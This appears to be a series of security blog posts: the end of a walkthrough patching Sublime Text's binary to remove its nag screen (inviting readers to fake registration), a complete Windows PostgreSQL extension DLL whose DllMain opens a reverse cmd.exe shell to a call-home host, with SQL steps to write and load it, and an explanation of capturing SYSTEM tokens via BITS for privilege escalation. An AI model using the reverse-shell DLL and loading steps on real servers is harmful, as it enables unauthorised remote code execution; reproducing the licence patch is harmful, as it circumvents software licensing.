    We open the hex view to see what the hex code for the start of the function looks like.



    Next we open sublime_text.exe in Hex Workshop and search for the hex string that matches the assembly.



    Finally, we patch the beginning of the function with the assembly opcode c3, which will cause the function to immediately return.



    After saving, there will be no more nag window. As an exercise to the reader, try to make Sublime think you have a registered copy.

    Windows DLL to Shell PostgreSQL Servers

    21 June 2016 at 04:07
    On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

    I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.


    #define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
    #define PG_REVSHELL_CALLHOME_PORT "4444"
    
    #include "postgres.h"
    #include <string.h>
    #include "fmgr.h"
    #include "utils/geo_decls.h"
    #include <winsock2.h> 
    
    #pragma comment(lib,"ws2_32")
    
    #ifdef PG_MODULE_MAGIC
    PG_MODULE_MAGIC;
    #endif
    
    #pragma warning(push)
    #pragma warning(disable: 4996)
    #define _WINSOCK_DEPRECATED_NO_WARNINGS
    
    BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, 
                        _In_ DWORD fdwReason, 
                        _In_ LPVOID lpvReserved)
    {
        WSADATA wsaData;
        SOCKET wsock;
        struct sockaddr_in server;
        char ip_addr[16];
        STARTUPINFOA startupinfo;
        PROCESS_INFORMATION processinfo;
    
        char *program = "cmd.exe";
        const char *ip = PG_REVSHELL_CALLHOME_SERVER;
        u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
    
        WSAStartup(MAKEWORD(2, 2), &wsaData);
        wsock = WSASocket(AF_INET, SOCK_STREAM, 
                          IPPROTO_TCP, NULL, 0, 0);
    
        struct hostent *host;
        host = gethostbyname(ip);
        strcpy_s(ip_addr, sizeof(ip_addr), 
                 inet_ntoa(*((struct in_addr *)host->h_addr)));
    
        server.sin_family = AF_INET;
        server.sin_port = htons(port);
        server.sin_addr.s_addr = inet_addr(ip_addr);
    
        WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server), 
                  NULL, NULL, NULL, NULL);
    
        memset(&startupinfo, 0, sizeof(startupinfo));
        startupinfo.cb = sizeof(startupinfo);
        startupinfo.dwFlags = STARTF_USESTDHANDLES;
        startupinfo.hStdInput = startupinfo.hStdOutput = 
                                startupinfo.hStdError = (HANDLE)wsock;
    
        CreateProcessA(NULL, program, NULL, NULL, TRUE, 0, 
                      NULL, NULL, &startupinfo, &processinfo);
    
        return TRUE;
    }
    
    #pragma warning(pop) /* re-enable 4996 */
    
    /* Add a prototype marked PGDLLEXPORT */
    PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
    
    PG_FUNCTION_INFO_V1(dummy_function);
    
    Datum dummy_function(PG_FUNCTION_ARGS)
    {
        int32 arg = PG_GETARG_INT32(0);
    
        PG_RETURN_INT32(arg + 1);
    }
    
    


    Here is the convoluted process of exploitation:
    postgres=# CREATE TABLE hextable (hex bytea);
    postgres=# CREATE TABLE lodump (lo OID);
    
    
    user@host:~/$ echo "INSERT INTO hextable (hex) VALUES 
                  (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
    user@host:~/$ psql -U postgres --host=localhost --file=sql.txt
    
    
    postgres=# INSERT INTO lodump SELECT hex FROM hextable; 
    postgres=# SELECT * FROM lodump;
      lo
    -------
     16409
    (1 row)
    postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
    postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
               'C:\Program Files\PostgreSQL\9.5\bin\pg_revshell.dll', 'dummy_function' LANGUAGE C STRICT; 
    

    BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

    18 February 2016 at 04:15

    The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), which belongs to NT AUTHORITY\SYSTEM (Local System), the root-equivalent user.


    BITS Manipulation is a pre-stage to modern privilege escalation attacks.

    BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the presence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has demonstrated a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

    Windows Tokens

    Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

    Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

    Token Impersonation Levels

    A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

    BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token at the SecurityImpersonation or SecurityDelegation level.
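
    As a rough illustration of that distinction, here is a small, portable C model of the four impersonation levels. The enum values mirror the ordering of Windows' SECURITY_IMPERSONATION_LEVEL, but level_name and level_allows_execution are hypothetical helpers written for this sketch, not Windows APIs.

```c
#include <assert.h>
#include <stdbool.h>

/* Mirrors the ordering of Windows' SECURITY_IMPERSONATION_LEVEL enum. */
typedef enum {
    SecurityAnonymous = 0,
    SecurityIdentification = 1,
    SecurityImpersonation = 2,
    SecurityDelegation = 3
} impersonation_level;

/* Hypothetical helper: human-readable name for a level. */
const char *level_name(impersonation_level level)
{
    static const char *names[] = {
        "SecurityAnonymous", "SecurityIdentification",
        "SecurityImpersonation", "SecurityDelegation"
    };
    /* Guard against values outside the four defined levels. */
    assert((int)level >= 0 && (int)level <= 3);
    return names[level];
}

/* Hypothetical helper: only SecurityImpersonation and above let a
 * thread act (run code, open objects) as the token's user. */
bool level_allows_execution(impersonation_level level)
{
    return level >= SecurityImpersonation;
}
```

    Under this model, a SecurityIdentification Token can be inspected to learn who the user is, but level_allows_execution returns false for it.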

    Identification-Only Exploitation

    There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

    Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:


    Before MS15-050 Patch: The calling thread's Token is checked to see if it is run as SYSTEM, or LUID 999.

    With the background information above, the bug is easy to spot. Here is the same code after the patch:


    After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.
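
    The two captions above can be approximated with a toy model in portable C. This is only a sketch of the logic as described here, not the actual services.exe code: the caller_token struct and both function names are hypothetical, and a real implementation would query the thread token through the Windows API.

```c
#include <stdbool.h>
#include <stdint.h>

/* Mirrors the ordering of Windows' SECURITY_IMPERSONATION_LEVEL enum. */
typedef enum {
    SecurityAnonymous = 0,
    SecurityIdentification = 1,
    SecurityImpersonation = 2,
    SecurityDelegation = 3
} impersonation_level;

#define SYSTEM_LUID 0x3e7u /* 999, the Local System LUID */

/* Hypothetical, stripped-down view of the calling thread's token. */
typedef struct {
    uint32_t luid;
    impersonation_level level;
} caller_token;

/* Pre-patch logic as described: only the LUID is compared, so an
 * identification-only SYSTEM token is accepted. */
bool is_system_before_patch(const caller_token *tok)
{
    return tok->luid == SYSTEM_LUID;
}

/* Post-patch logic as described: the impersonation level is
 * verified before the SYSTEM check. */
bool is_system_after_patch(const caller_token *tok)
{
    if (tok->level < SecurityImpersonation)
        return false;
    return tok->luid == SYSTEM_LUID;
}
```

    With a token of { SYSTEM_LUID, SecurityIdentification }, the first check passes while the second rejects it, which is the gap an identification-only token relies on.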

    It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only at the SecurityIdentification level. Many token access control vulnerabilities have already been discovered, and more are likely to be found.

    BITS Manipulation Methodology

    BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.


    Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

    Here is the general methodology, which can be performed as a non-Administrator user on the machine:

    1. Create a BITS server with a local context.
    2. Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
    3. Capture SYSTEM's token when it interacts with the server.

    BITS Manipulation Implementation

    BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral, object-oriented binary interface that is arguably a precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer who is familiar with the aforementioned methodology and the BITS documentation, and who has experience using COM.

    An existing implementation is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts. It is uncredited, but was likely written by James Forshaw of Google's Project Zero.
